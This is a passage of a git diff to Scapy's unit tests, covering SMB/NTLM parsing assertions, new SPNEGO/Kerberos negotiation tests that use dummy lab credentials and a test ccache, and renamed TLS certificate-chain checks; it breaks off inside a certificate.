-130,8 +130,8 @@ assert SMBSession_Setup_AndX_Request_Extended_Security in smb_sax_req_2 assert smb_sax_req_2.Flags2.EXTENDED_SECURITY assert smb_sax_req_2.Flags2.UNICODE assert smb_sax_req_2.AndXCommand == 255 -assert smb_sax_req_2.SecurityBlob.token.negResult == 1 -ntlm_authenticate = NTLM_Header(smb_sax_req_2.SecurityBlob.token.responseToken.value.val) +assert smb_sax_req_2.SecurityBlob.token.negState == 1 +ntlm_authenticate = smb_sax_req_2.SecurityBlob.token.responseToken.value assert isinstance(ntlm_authenticate, NTLM_AUTHENTICATE) assert len(ntlm_authenticate.Payload) == 3 assert ntlm_authenticate.Payload[0] == ('Workstation', 'DESKTOP-V1FA0UQ') @@ -144,8 +144,10 @@ assert ntlm_authenticate.Payload[2][1] == b'/\t\x13+\x81\xa6\x15\x14\xb9\x11\x8b smb_sax_resp_2 = Ether(b'\x00\x0c)a\xf5_\x00PV\xc0\x00\x01\x08\x00E\x00\x00\xb6\x03J@\x00\x80\x06\xe7\x1f\xc0\xa8\xc7\x01\xc0\xa8\xc7\x85\x00\x8b\xc2\x08\x10]~J\xd7\xcb\xf0YP\x18\x00\xfeB\x10\x00\x00\x00\x00\x00\x8a\xffSMBs\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe\x00\x08 \x00\x04\xff\x00\x8a\x00\x00\x00\x1d\x00_\x00\xa1\x1b0\x19\xa0\x03\n\x01\x00\xa3\x12\x04\x10\x01\x00\x00\x00\xee\t\x91S\xab\x7f]\xe6\x00\x00\x00\x00W\x00i\x00n\x00d\x00o\x00w\x00s\x00 \x008\x00.\x001\x00 \x009\x006\x000\x000\x00\x00\x00W\x00i\x00n\x00d\x00o\x00w\x00s\x00 \x008\x00.\x001\x00 \x006\x00.\x003\x00\x00\x00') assert SMBSession_Setup_AndX_Response_Extended_Security in smb_sax_resp_2 -assert smb_sax_resp_2.SecurityBlob.token.negResult == 0 -assert smb_sax_resp_2.SecurityBlob.token.mechListMIC.value.val == b'\x01\x00\x00\x00\xee\t\x91S\xab\x7f]\xe6\x00\x00\x00\x00' +assert smb_sax_resp_2.SecurityBlob.token.negState == 0 +assert smb_sax_resp_2.SecurityBlob.token.mechListMIC.value.Version == 1 +assert smb_sax_resp_2.SecurityBlob.token.mechListMIC.value.Checksum == b'\xee\t\x91S\xab\x7f]\xe6' +assert smb_sax_resp_2.SecurityBlob.token.mechListMIC.value.SeqNum == 0 assert smb_sax_resp_2.NativeOS == 'Windows 8.1 9600' assert smb_sax_resp_2.NativeLanMan == 'Windows 8.1 6.3' diff --git a/test/scapy/layers/spnego.uts b/test/scapy/layers/spnego.uts new file mode 100644 index 00000000000..ff04b448091 --- /dev/null +++ b/test/scapy/layers/spnego.uts @@ -0,0 +1,317 @@ +% SPNEGO unit tests + ++ Special SPNEGO tests + += SPNEGOSSP - test raw fallback + +% A SPNEGOSSP server talking to a non SPNEGOSSP client should work. + +srvssp = SPNEGOSSP([KerberosSSP(), NTLMSSP(IDENTITIES={"User1": MD4le("Password123!")})]) +clissp = NTLMSSP(UPN="User1", PASSWORD="Password123!") + +clictx, tok, status = clissp.GSS_Init_sec_context(None) +assert status == GSS_S_CONTINUE_NEEDED, status +srvctx, tok, status = srvssp.GSS_Accept_sec_context(None, tok) +assert status == GSS_S_CONTINUE_NEEDED, status +clictx, tok, status = clissp.GSS_Init_sec_context(clictx, tok) +assert status == GSS_S_COMPLETE, status +srvctx, tok, status = srvssp.GSS_Accept_sec_context(srvctx, tok) +assert status == GSS_S_COMPLETE, status +assert tok is None, repr(tok) + += SPNEGOSSP - SSP negotiation + mechListMIC + +% Two SPNEGOSSPs with different preferred mechanisms should work, +% and mechListMIC should be used. + +srvssp = SPNEGOSSP([ + KerberosSSP(), + NTLMSSP(IDENTITIES={"User1": MD4le("Password123!")}) +]) +clissp = SPNEGOSSP([ + NTLMSSP(UPN="User1", PASSWORD="Password123!"), +]) + +clictx, tok, status = clissp.GSS_Init_sec_context(None) +assert clictx.require_mic +assert status == GSS_S_CONTINUE_NEEDED, status +assert len(tok.innerToken.token.mechTypes) == 1 +assert tok.innerToken.token.mechTypes[0].oid.val == '1.3.6.1.4.1.311.2.2.10' +assert tok.innerToken.token.mechListMIC is None +assert tok.innerToken.token._mechListMIC is None +assert isinstance(tok.innerToken.token.mechToken.value, NTLM_NEGOTIATE) + +srvctx, tok, status = srvssp.GSS_Accept_sec_context(None, tok) +assert srvctx.require_mic +assert status == GSS_S_CONTINUE_NEEDED, status +assert tok.token.mechListMIC is None +assert tok.token.negState == 1 +assert tok.token.supportedMech.oid.val == '1.3.6.1.4.1.311.2.2.10' +assert isinstance(tok.token.responseToken.value, NTLM_CHALLENGE) + +clictx, tok, status = clissp.GSS_Init_sec_context(clictx, tok) +assert status == GSS_S_CONTINUE_NEEDED, status +assert tok.token.negState is None +assert tok.token.supportedMech is None +assert isinstance(tok.token.responseToken.value, NTLM_AUTHENTICATE) +assert isinstance(tok.token.mechListMIC.value, NTLMSSP_MESSAGE_SIGNATURE) +assert tok.token.mechListMIC.value.SeqNum == 0 +assert tok.token.mechListMIC.value.Version == 1 + +srvctx, tok, status = srvssp.GSS_Accept_sec_context(srvctx, tok) +assert status == GSS_S_COMPLETE, status +assert tok is not None +assert isinstance(tok.token, SPNEGO_negTokenResp) +assert isinstance(tok.token.mechListMIC.value, NTLMSSP_MESSAGE_SIGNATURE) +assert tok.token.mechListMIC.value.Version == 1 +assert tok.token.mechListMIC.value.SeqNum == 0 + +clictx, tok, status = clissp.GSS_Init_sec_context(clictx, tok) +assert status == GSS_S_COMPLETE, status +assert tok is None + += SPNEGOSSP - SSP negotiation + mechListMIC - NegTokenInit2 + +% Same but with NegTokenInit2 + +srvssp = SPNEGOSSP([ + KerberosSSP(), + NTLMSSP(IDENTITIES={"User1": MD4le("Password123!")}) +]) +clissp = SPNEGOSSP([ + NTLMSSP(UPN="User1", PASSWORD="Password123!"), +]) + +srvctx, tok = srvssp.NegTokenInit2() +assert tok.MechType.val == '1.3.6.1.5.5.2' +assert [x.oid.val for x in tok.innerToken.token.mechTypes] == [ + '1.2.840.48018.1.2.2', + '1.2.840.113554.1.2.2', + '1.3.6.1.4.1.311.2.2.10', +] +assert tok.innerToken.token.reqFlags is None +assert tok.innerToken.token.mechToken is None +assert tok.innerToken.token.negHints.hintName.val == "not_defined_in_RFC4178@please_ignore" +assert tok.innerToken.token.mechListMIC is None +assert tok.innerToken.token._mechListMIC is None + +clictx, tok, status = clissp.GSS_Init_sec_context(None, tok) +assert clictx.require_mic +assert status == GSS_S_CONTINUE_NEEDED, status +assert len(tok.innerToken.token.mechTypes) == 1 +assert tok.innerToken.token.mechTypes[0].oid.val == '1.3.6.1.4.1.311.2.2.10' +assert tok.innerToken.token.mechListMIC is None +assert tok.innerToken.token._mechListMIC is None +assert isinstance(tok.innerToken.token.mechToken.value, NTLM_NEGOTIATE) + +srvctx, tok, status = srvssp.GSS_Accept_sec_context(srvctx, tok) +assert srvctx.require_mic +assert status == GSS_S_CONTINUE_NEEDED, status +assert tok.token.mechListMIC is None +assert tok.token.negState == 1 +assert tok.token.supportedMech.oid.val == '1.3.6.1.4.1.311.2.2.10' +assert isinstance(tok.token.responseToken.value, NTLM_CHALLENGE) + +clictx, tok, status = clissp.GSS_Init_sec_context(clictx, tok) +assert status == GSS_S_CONTINUE_NEEDED, status +assert tok.token.negState is None +assert tok.token.supportedMech is None +assert isinstance(tok.token.responseToken.value, NTLM_AUTHENTICATE) +assert isinstance(tok.token.mechListMIC.value, NTLMSSP_MESSAGE_SIGNATURE) +assert tok.token.mechListMIC.value.SeqNum == 0 +assert tok.token.mechListMIC.value.Version == 1 + +# INJECT FAULT: drop mechListMIC here, and make sure that the server doesn't let it go through. +tok.token.mechListMIC = None + +srvctx, tok, status = srvssp.GSS_Accept_sec_context(srvctx, tok) +assert status == GSS_S_CONTINUE_NEEDED, status # Should now be CONTINUE instead of COMPLETE ! + += SPNEGOSSP.from_cli_arguments - Utils + +from unittest import mock + +# Detect password prompts +def password_failure(*args, **kwargs): + raise ValueError("Password was prompted unexpectedly !") + +def password_input(*args, **kwargs): + return "Password" + + +def test_pwfail(**kwargs): + """Password means failure""" + with mock.patch('prompt_toolkit.prompt', side_effect=password_failure): + return SPNEGOSSP.from_cli_arguments(**kwargs) + + +def test_pwinput(**kwargs): + """Password is entered""" + with mock.patch('prompt_toolkit.prompt', side_effect=password_input): + return SPNEGOSSP.from_cli_arguments(**kwargs) + += SPNEGOSSP.from_cli_arguments - Username + Password - With input + +ssp = test_pwinput( + UPN="Administrator", + target="machine.domain.local", +) +assert isinstance(ssp, SPNEGOSSP) +assert len(ssp.ssps) == 1 +assert ssp.ssps[0].HASHNT == b'\xa4\xf4\x9c@e\x10\xbd\xca\xb6\x82N\xe7\xc3\x0f\xd8R' + += SPNEGOSSP.from_cli_arguments - Username + Password - With prompt + +try: + test_pwfail( + UPN="Administrator", + target="machine.domain.local", + ) + assert False, "Should have prompted for password !" +except ValueError: + pass + += SPNEGOSSP.from_cli_arguments - Username + Password - No input + +ssp = test_pwfail( + UPN="Administrator", + target="machine.domain.local", + password="Password", +) +assert isinstance(ssp, SPNEGOSSP) +assert len(ssp.ssps) == 1 +assert ssp.ssps[0].HASHNT == b'\xa4\xf4\x9c@e\x10\xbd\xca\xb6\x82N\xe7\xc3\x0f\xd8R' + += SPNEGOSSP.from_cli_arguments - UPN + Password - With input + +ssp = test_pwinput( + UPN="Administrator@domain.local", + target="machine.domain.local", +) +assert isinstance(ssp, SPNEGOSSP) +assert len(ssp.ssps) == 2 +assert isinstance(ssp.ssps[0], KerberosSSP) +assert ssp.ssps[0].UPN == "Administrator@domain.local" +assert isinstance(ssp.ssps[1], NTLMSSP) +assert ssp.ssps[1].HASHNT == b'\xa4\xf4\x9c@e\x10\xbd\xca\xb6\x82N\xe7\xc3\x0f\xd8R' + += SPNEGOSSP.from_cli_arguments - UPN + CCache - Prepare + +import os, base64 +from scapy.utils import get_temp_file + +# Create CCACHE +DATA = """ +BQQAAAAAAAAAAAAAAAAAAAAAAAEAAAABAAAADERPTUFJTi5MT0NBTAAAAA1BZG1pbmlzdHJhdG9y +AAAAAgAAAAIAAAAMRE9NQUlOLkxPQ0FMAAAABmtyYnRndAAAAAxET01BSU4uTE9DQUwAEgAAACAb +BwocJhrPafZNOEpgJ0Ex7+bIGgYmV1xIOINqhSFV12ktpDBpLaQwaS4wy2kuMMsAQOEAAAAAAAAA +AAAAAAAE2GGCBNQwggTQoAMCAQWhDhsMRE9NQUlOLkxPQ0FMoiEwH6ADAgECoRgwFhsGa3JidGd0 +GwxET01BSU4uTE9DQUyjggSUMIIEkKADAgESoQMCAQKiggSCBIIEfhztXzlAS96FcY2W1vT3dfYk +skGMQuNRwWGyCKReTQQoSNuN+HXmtGgTlEAtf/L0QS5TCAzJKKbnvK6uNw19q/fYd/PJJMbOibmO +Ga1AWrt66Unrcq+AS/iMNgWYtW1qk+Kz7GmkwP/+seilbgZVZPK1JVg0m5oAQn8k8l53Sq6dPvDX +SB7eGtE0UzAM5a5CrpdKALtgbpkjSX2Y8QGmNEC3fVag2k7NP8ZHLd6qLoAmuUDB660vFFIXloRw +RZUe+wpeKX/d3pwcUyJiH0KJlEtPLldgo3EmBo9bUSzxul1MZ6s4oJNWX6MCOVwuTpDnJakBlmH5 +XAFGtxi0Ip7hGpgh4E8AOuhzEJhKaZK4VofcZQAU3KiGq1uOv/4Ema+TxXL83lbdpHX2T3D6naZZ +LOom6cOyMaYzWLs7UGmXtKKubIC5ePlCeV/lrFrEX0zOc86rxdEPw7DXvn4RfukTSjW74+9uiQYv +foqZTB6RIa+OmBg5SOWnceTnwC9P78jNLS5guOjOgBZ0xAMYeXydNloVW3h+XyngNdxiT3qCO+II +rl4uB9ugCQnod1PsvU6cJ6t1OfvhsB+6hXkoloA+RpssC/aMyzWE5985xSBoc91j4P4U6ZJWaCdr +3CaquJVVvIEgAQchlf6aWLI71CYCM+T9dXuzXTbtap7tsYq8/9hWBNs7rwIb7Mok0Zrn74WyU1tB +0fHXLIJqk4wEK4+Kp1w+vSvjULyXhhX1T9IGoTHXKUaXFc5MmLxG9P0jwA4VhrKI6thxK5MRN7gK +xw1OkGDzISTLtr6J4Po6b5ghI4hbxk7AA6y0PwN7DHhIl9OiZPqMcvv5byX6sUc0OSGaFGa0A1uz +/sdsYopfnD0zKBaWXBo9B8MHQ1RQnYjydwCJ78J0few83ZBE8vcb52ngkeIppaEnRuiMCZd0+bsv +X19xsbIXnq08jxrzdn2aqLuWQxHMr/sddfbe5blmGS1JFuwms/m45Ha1T3wK65Efcm6Xtn7qWZOh +GDmptGmM93V/tXpbTEfD18EchMDGxx+LMDOa1nCzOeTXeyEfg4sJp6oOc2+8K7GbwPWdjIomp95R +m/OcgN3DThRC7uELcpLcep5hAdqrPvKYovZeiYsPLl0mdyJ2dWjcOaPg+S3m/T5BOsNSVF4yEWEc +kE7Ahy5QDvag0UFs9vGjkdeKTXk00fQTBCMNLQSO42afxJOoOaYN8gJu81cut1h4ZJm9RngDI+8C +Q+1Yxf9eP/PChFVaL6WL2nsZOqdDjJ4/19qqBK9eDgMzaOqggR91i9m7Tb4AYvb8LnyKh+UE0VBC +lfUM3RD2MA65+OZaEvVDfsWMNdJS1QY9LaW39Dh5n6gV76YmAv0zc1qHux0Z2mOASr3d2aezAFpo +rhcKMZz5YuxbWTB559eoGZNGjRi1gmjVRVTe+mt92Ww8u1eDXV64aH4zc5n7uZpqsWnyRz8K2jjE +slXWBjQr9vLT3ChFnSuH9qKhE+W7vTcdy3k1VuMHL6831nqB17sXR/cZYt0Ajc+L71oAAAAAAAAA +AQAAAAEAAAAMRE9NQUlOLkxPQ0FMAAAADUFkbWluaXN0cmF0b3IAAAADAAAAAgAAAAxET01BSU4u +TE9DQUwAAAAEY2lmcwAAABBEQzEuRE9NQUlOLkxPQ0FMABIAAAAgxahEIPO0srYHJe89OfcWetLT +G6WLKdDHKMTn0+wtykZpLaQwaS2kPGkuMMtpLjDLAEClAAAAAAAAAAAAAAAABPphggT2MIIE8qAD +AgEFoQ4bDERPTUFJTi5MT0NBTKIjMCGgAwIBA6EaMBgbBGNpZnMbEERDMS5ET01BSU4uTE9DQUyj +ggS0MIIEsKADAgESoQMCAQOiggSiBIIEnragYfz/CVtO/WA8R5S6DwhWbd1cxVKg7KnLMrqqbcwx +3USZktAVxuPeLpoUMDLfs5D5ADUo4jHlLJrEAbGsWdFj7DgMYIHIWftRNIvGcCQqjG3/gvL/16+C +GU6ghCUuVKpq16J2KRiHf97QnCAL79PK2d52L+k+f106GI+pRqWlpvrDEHd4Xtve/OW37sXRM3ar +NYUfwjR4uVK7FzHWzisKb8DjgoqZJHt83LVh7Zk2Qxc6p0PMThwWLEI7RB9l8ll30C5cq1qH5kvh +olIipAuAFxNniqE6UZl5GByGg9ck7KDrVrtz9p111BiCxnspfGdPuswjakiSNViSmCV7IsqH16gd +9Z9VBlNNU//mLJd93qsdSxbLclY6F7D7TCAbyv4fgMrDeQ6GVqgjEDG8xtp7T5LUMZPwSgM0pVol +kAWwSbmUh8i4OXQIzI0EAv2aNi0BsCWg1sb9Ri0NVQT5wSaFGHVpinxqrNVd5/mC2a4QgeQ2fOx9 +3fJmShdsrVjVPfcqvedk0L1xw0992l1K18KmtPFu7BhgfkJPOR+FfHJa2zPfnIGsbvuC282vBCbD +krDOug/Uqn01WUmUiwwGBWSTWOOfVDBFy6ETxXJvIkwV8n6Q1wMi8LgcBKc4LdHjbEqc8xJ8yvhA +YJ00xOQNkCu/XK6R4gV5ZkhMs3tB7FoKYbizyAKSuhow3f8Bej/+Lp4VH6gqY33us3jImFizDPmG +lcOrvTl2l0l8ZnQwpT/qP46yD34EIIvujZImf+gFv27F6SFhPkUmi0xISRCJU7XwYdZjNNhnsuom +lGeBvDYhGQtJZ44ZXM7cRggQ+46y60KsHhZHucx5fIzrWrTWUur/gyzf4/ExB3YHX8k4WqzLbt0H +t31LviTZf2a1A2ODwZTp2K8Q506qwr/e+wDRr+uNBOBo04c/tlpvSdi+lrbZODNMHGVIkuCo01Ei +r68jRWaqmTrasXC5tmWyXiH3egN1BkUXqieXNBWYowTc7qr+820TbsOkMTPrxJje0cbvppT3NmB7 +EwyldUoxKDbrtOVr1VvnQWB8IHA2UwRDeuiHP2lRUGHyAHYDH2tlcpGhpk5jqrh4ok93mzZQ1EUz +qbc9tNIRFJCGJlRnf8F5Vy1Xr7o/RfiVooOFXLktC8COr+lwccV1xQfhKEDLOgvqvVHjaQAvlp5v +3Ce5973nwaQ3ttJakXXX5xk94Jzr9JeP/WIoVVHAnl661Zpd01KHIh8Belk+q2xRbJYKLRVmaoG3 +jZmMYkEyP0W0KF3BBFMwRSXJkmyCojpebxKUPBeLelD+l7f2LY/limNhq3F/yju3HAGnuKRPybOu +haMfIiGCaH3FgEqFrudK+KQq4T5CZT/PoGsdmIK+WCElYahwGM6tueVa4RHhBHlSbi0Uyx7KexjL +UHk7A8VRQvSMuQ0S6mj3rOp2w03ZeN+eHcj02cECUx0Sv2MQ5ds5o839X3Z/NsdquJ+83gx7SEHo +7ziAcW28wWcCS1m+eRtxJA2rHILASEwsJbhXQVmllqRY3IuYGztLbKpPKUzveq/2JVBHYZPgKb56 +UJ8RjD9bppHbawAAAAA= +""" +ccache_file = get_temp_file() +with open(ccache_file, "wb") as fd: + fd.write(base64.b64decode(DATA.strip())) + +os.environ["KRB5CCNAME"] = ccache_file + += SPNEGOSSP.from_cli_arguments - UPN + CCache - TGT from KRB5CCNAME + +ssp = test_pwfail( + UPN="Administrator@domain.local", + target="machine.domain.local", + use_krb5ccname=True, +) +assert len(ssp.ssps) == 1 +assert ssp.ssps[0].TGT +assert not ssp.ssps[0].ST + += SPNEGOSSP.from_cli_arguments - UPN + CCache - TGT from ccache + +ssp = test_pwfail( + UPN="Administrator@domain.local", + target="machine.domain.local", + ccache=ccache_file +) +assert len(ssp.ssps) == 1 +assert ssp.ssps[0].TGT +assert not ssp.ssps[0].ST + += SPNEGOSSP.from_cli_arguments - UPN + CCache - ST from ccache + +ssp = test_pwfail( + UPN="Administrator@domain.local", + target="dc1.domain.local", + ccache=ccache_file +) +assert len(ssp.ssps) == 1 +assert ssp.ssps[0].ST +assert not ssp.ssps[0].TGT + += SPNEGOSSP.from_cli_arguments - UPN + CCache - Failure + +try: + test_pwfail( + UPN="Administrator@domain.local", + target="machine.domain.local", + ) + assert False, "Should have prompted for password !" +except ValueError: + pass + += SPNEGOSSP.from_cli_arguments - UPN + CCache - Bad UPN + +try: + test_pwfail( + UPN="toto@domain.local", + target="machine.domain.local", + ccache=ccache_file + ) + assert False, "Should have failed !" +except ValueError: + pass diff --git a/test/scapy/layers/tls/cert.uts b/test/scapy/layers/tls/cert.uts index f0a258e4db4..35a8d050059 100644 --- a/test/scapy/layers/tls/cert.uts +++ b/test/scapy/layers/tls/cert.uts @@ -332,8 +332,8 @@ assert abs(x.remainingDays("02/12/11")) > 5000 assert abs(x.remainingDays("Feb 12 10:00:00 2011 Paris, Madrid")) > 1 = Cert class : Checking RSA public key -assert type(x.pubKey) is PubKeyRSA -x_pubNum = x.pubKey.pubkey.public_numbers() +assert type(x.pubkey) is PubKeyRSA +x_pubNum = x.pubkey.pubkey.public_numbers() assert x_pubNum.n == 19231328316532061413420367242571475005688288081144416166988378525696075445024135424022026378563116068168327239354659928492979285632474448448624869172454076124150405352043642781483254546569202103296262513098482624188672299255268092629150366527784294463900039290024710152521604731213565912934889752122898104556895316819303096201441834849255370122572613047779766933573375974464479123135292080801384304131606933504677232323037116557327478512106367095125103346134248056463878553619525193565824925835325216545121044922690971718737998420984924512388011040969150550056783451476150234324593710633552558175109683813482739004163 x_pubNum.e == 0x10001 @@ -357,9 +357,9 @@ fstat = os.stat(filename) assert fstat.st_size == 1302 os.remove(filename) -= Cert class : isIssuerCert += Cert class : isIssuer -assert x.isIssuerCert(x) +assert x.isIssuer(x) = Cert class : Importing another PEM-encoded X.509 Certificate y = Cert(""" @@ -381,8 +381,8 @@ JjZ91eQ0hjkCMHw2U/Aw5WJjOpnitqM7mzT6HtoQknFekROn3aRukswy1vUhZscv """) = Cert class : Checking ECDSA public key -assert type(y.pubKey) is PubKeyECDSA -pubkey = y.pubKey.pubkey +assert type(y.pubkey) is PubKeyECDSA +pubkey = y.pubkey.pubkey assert pubkey.curve.name == 'secp384r1' pubkey.public_numbers().x == 3987178688175281746349180015490646948656137448666005327832107126183726641822596270780616285891030558662603987311874 @@ -524,7 +524,7 @@ with ContextManagerCaptureOutput() as cmco: ########### High-level methods ############################################### -= Cert class : Checking isIssuerCert() += Cert class : Checking isIssuer() c0 = Cert(""" -----BEGIN CERTIFICATE----- MIIFVjCCBD6gAwIBAgIJAJmDv7HOC+iUMA0GCSqGSIb3DQEBCwUAMIHGMQswCQYD @@ -614,130 +614,53 @@ pL/QlwVKvOoYKAKQvVR4CSFx09F9HdkWsKlhPdAKACL8x3vLCWRFCztAgfd9fDL1 mMpYjn0q7pBZc2T5NnReJaH1ZgUufzkVqSr7UIuOhWn0 -----END CERTIFICATE----- """) -c0.isIssuerCert(c1) and c1.isIssuerCert(c2) and not c0.isIssuerCert(c2) +assert c0.isIssuer(c1) and c1.isIssuer(c2) and not c0.isIssuer(c2) = Cert class : Checking isSelfSigned() -c2.isSelfSigned() and not c1.isSelfSigned() and not c0.isSelfSigned() +assert c2.isSelfSigned() and not c1.isSelfSigned() and not c0.isSelfSigned() = PubKey class : Checking verifyCert() -c2.pubKey.verifyCert(c2) and c1.pubKey.verifyCert(c0) +assert c2.pubkey.verifyCert(c2) and c1.pubkey.verifyCert(c0) -= Chain class : Checking chain construction -assert len(Chain([c0, c1, c2])) == 3 -assert len(Chain([c0], c1)) == 2 -len(Chain([c0], c2)) == 1 += CertTree class : Checking verification of chain +chain0 = CertTree([c0, c1, c2]).getchain(c0) +assert len(chain0) == 3 +assert chain0[0] == c1 +assert chain0[1] == c0 +assert chain0[2] == c2 +chain1 = CertTree([c2, c1, c0]).getchain(c1) +assert len(chain1) == 2 +assert chain1[0] == c1 +assert chain1[1] == c2 +chain2 = CertTree([c0, c2, c1]).getchain(c2) +assert len(chain2) == 1 +assert chain2[0] == c2 -= Chain class : repr += CertTree class : show() -expected_repr = """__ /C=US/ST=Arizona/L=Scottsdale/O=Starfield Technologies, Inc./CN=Starfield Root Certificate Authority - G2 [Self Signed] - _ /C=US/ST=Arizona/L=Scottsdale/O=Starfield Technologies, Inc./OU=http://certs.starfieldtech.com/repository//CN=Starfield Secure Certificate Authority - G2 - _ /OU=Domain Control Validated/CN=*.tools.ietf.org""" -assert str(Chain([c0, c1, c2])) == expected_repr +expected_repr = '/C=US/ST=Arizona/L=Scottsdale/O=Starfield Technologies, Inc./CN=Starfield Root Certificate Authority - G2 [Self Signed]\n /C=US/ST=Arizona/L=Scottsdale/O=Starfield Technologies, Inc./OU=http://certs.starfieldtech.com/repository//CN=Starfield Secure Certificate Authority - G2 [Not Self Signed]\n /OU=Domain Control Validated/CN=*.tools.ietf.org [Not Self Signed]\n' +assert CertTree([c0, c1, c2]).show(ret=True) == expected_repr -= Chain class : Checking chain verification -assert Chain([], c0).verifyChain([c2], [c1]) -not Chain([c1]).verifyChain([c0]) +repr_str = CertTree([], c0).show(ret=True) +assert repr_str == '/OU=Domain Control Validated/CN=*.tools.ietf.org [Not Self Signed]\n' -= Chain class: Checking chain verification with file += CertTree class : verify -import tempfile - -tf_folder = tempfile.mkdtemp() - -try: - os.makedirs(tf_folder) -except: - pass - -tf = os.path.join(tf_folder, "trusted") -utf = os.path.join(tf_folder, "untrusted") - -tf -utf - -# Create files -trusted = open(tf, "w") -trusted.write(""" ------BEGIN CERTIFICATE----- -MIIFADCCA+igAwIBAgIBBzANBgkqhkiG9w0BAQsFADCBjzELMAkGA1UEBhMCVVMx -EDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxJTAjBgNVBAoT -HFN0YXJmaWVsZCBUZWNobm9sb2dpZXMsIEluYy4xMjAwBgNVBAMTKVN0YXJmaWVs -ZCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAtIEcyMB4XDTExMDUwMzA3MDAw -MFoXDTMxMDUwMzA3MDAwMFowgcYxCzAJBgNVBAYTAlVTMRAwDgYDVQQIEwdBcml6 -b25hMRMwEQYDVQQHEwpTY290dHNkYWxlMSUwIwYDVQQKExxTdGFyZmllbGQgVGVj -aG5vbG9naWVzLCBJbmMuMTMwMQYDVQQLEypodHRwOi8vY2VydHMuc3RhcmZpZWxk -dGVjaC5jb20vcmVwb3NpdG9yeS8xNDAyBgNVBAMTK1N0YXJmaWVsZCBTZWN1cmUg -Q2VydGlmaWNhdGUgQXV0aG9yaXR5IC0gRzIwggEiMA0GCSqGSIb3DQEBAQUAA4IB -DwAwggEKAoIBAQDlkGZL7PlGcakgg77pbL9KyUhpgXVObST2yxcT+LBxWYR6ayuF -pDS1FuXLzOlBcCykLtb6Mn3hqN6UEKwxwcDYav9ZJ6t21vwLdGu4p64/xFT0tDFE -3ZNWjKRMXpuJyySDm+JXfbfYEh/JhW300YDxUJuHrtQLEAX7J7oobRfpDtZNuTlV -Bv8KJAV+L8YdcmzUiymMV33a2etmGtNPp99/UsQwxaXJDgLFU793OGgGJMNmyDd+ -MB5FcSM1/5DYKp2N57CSTTx/KgqT3M0WRmX3YISLdkuRJ3MUkuDq7o8W6o0OPnYX -v32JgIBEQ+ct4EMJddo26K3biTr1XRKOIwSDAgMBAAGjggEsMIIBKDAPBgNVHRMB -Af8EBTADAQH/MA4GA1UdDwEB/wQEAwIBBjAdBgNVHQ4EFgQUJUWBaFAmOD07LSy+ -zWrZtj2zZmMwHwYDVR0jBBgwFoAUfAwyH6fZMH/EfWijYqihzqsHWycwOgYIKwYB -BQUHAQEELjAsMCoGCCsGAQUFBzABhh5odHRwOi8vb2NzcC5zdGFyZmllbGR0ZWNo -LmNvbS8wOwYDVR0fBDQwMjAwoC6gLIYqaHR0cDovL2NybC5zdGFyZmllbGR0ZWNo -LmNvbS9zZnJvb3QtZzIuY3JsMEwGA1UdIARFMEMwQQYEVR0gADA5MDcGCCsGAQUF -BwIBFitodHRwczovL2NlcnRzLnN0YXJmaWVsZHRlY2guY29tL3JlcG9zaXRvcnkv -MA0GCSqGSIb3DQEBCwUAA4IBAQBWZcr+8z8KqJOLGMfeQ2kTNCC+Tl94qGuc22pN -QdvBE+zcMQAiXvcAngzgNGU0+bE6TkjIEoGIXFs+CFN69xpk37hQYcxTUUApS8L0 -rjpf5MqtJsxOYUPl/VemN3DOQyuwlMOS6eFfqhBJt2nk4NAfZKQrzR9voPiEJBjO -eT2pkb9UGBOJmVQRDVXFJgt5T1ocbvlj2xSApAer+rKluYjdkf5lO6Sjeb6JTeHQ -sPTIFwwKlhR8Cbds4cLYVdQYoKpBaXAko7nv6VrcPuuUSvC33l8Odvr7+2kDRUBQ -7nIMpBKGgc0T0U7EPMpODdIm8QC3tKai4W56gf0wrHofx1l7 ------END CERTIFICATE----- -""") -trusted.close() - -untrusted = open(utf, "w") -untrusted.write(""" ------BEGIN CERTIFICATE----- -MIID3TCCAsWgAwIBAgIBADANBgkqhkiG9w0BAQsFADCBjzELMAkGA1UEBhMCVVMx -EDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxJTAjBgNVBAoT -HFN0YXJmaWVsZCBUZWNobm9sb2dpZXMsIEluYy4xMjAwBgNVBAMTKVN0YXJmaWVs -ZCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAtIEcyMB4XDTA5MDkwMTAwMDAw -MFoXDTM3MTIzMTIzNTk1OVowgY8xCzAJBgNVBAYTAlVTMRAwDgYDVQQIEwdBcml6 -b25hMRMwEQYDVQQHEwpTY290dHNkYWxlMSUwIwYDVQQKExxTdGFyZmllbGQgVGVj -aG5vbG9naWVzLCBJbmMuMTIwMAYDVQQDEylTdGFyZmllbGQgUm9vdCBDZXJ0aWZp -Y2F0ZSBBdXRob3JpdHkgLSBHMjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC -ggEBAL3twQP89o/8ArFvW59I2Z154qK3A2FWGMNHttfKPTUuiUP3oWmb3ooa/RMg -nLRJdzIpVv257IzdIvpy3Cdhl+72WoTsbhm5iSzchFvVdPtrX8WJpRBSiUZV9Lh1 -HOZ/5FSuS/hVclcCGfgXcVnrHigHdMWdSL5stPSksPNkN3mSwOxGXn/hbVNMYq/N -Hwtjuzqd+/x5AJhhdM8mgkBj87JyahkNmcrUDnXMN/uLicFZ8WJ/X7NfZTD4p7dN -dloedl40wOiWVpmKs/B/pM293DIxfJHP4F8R+GuqSVzRmZTRouNjWwl2tVZi4Ut0 -HZbUJtQIBFnQmA4O5t78w+wfkPECAwEAAaNCMEAwDwYDVR0TAQH/BAUwAwEB/zAO -BgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYEFHwMMh+n2TB/xH1oo2Kooc6rB1snMA0G -CSqGSIb3DQEBCwUAA4IBAQARWfolTwNvlJk7mh+ChTnUdgWUXuEok21iXQnCoKjU -sHU48TRqneSfioYmUeYs0cYtbpUgSpIB7LiKZ3sx4mcujJUDJi5DnUox9g61DLu3 -4jd/IroAow57UvtruzvE03lRTs2Q9GcHGcg8RnoNAX3FWOdt5oUwF5okxBDgBPfg -8n/Uqgr/Qh037ZTlZFkSIHc40zI+OIF1lnP6aI+xy84fxez6nH7PfrHxBy22/L/K 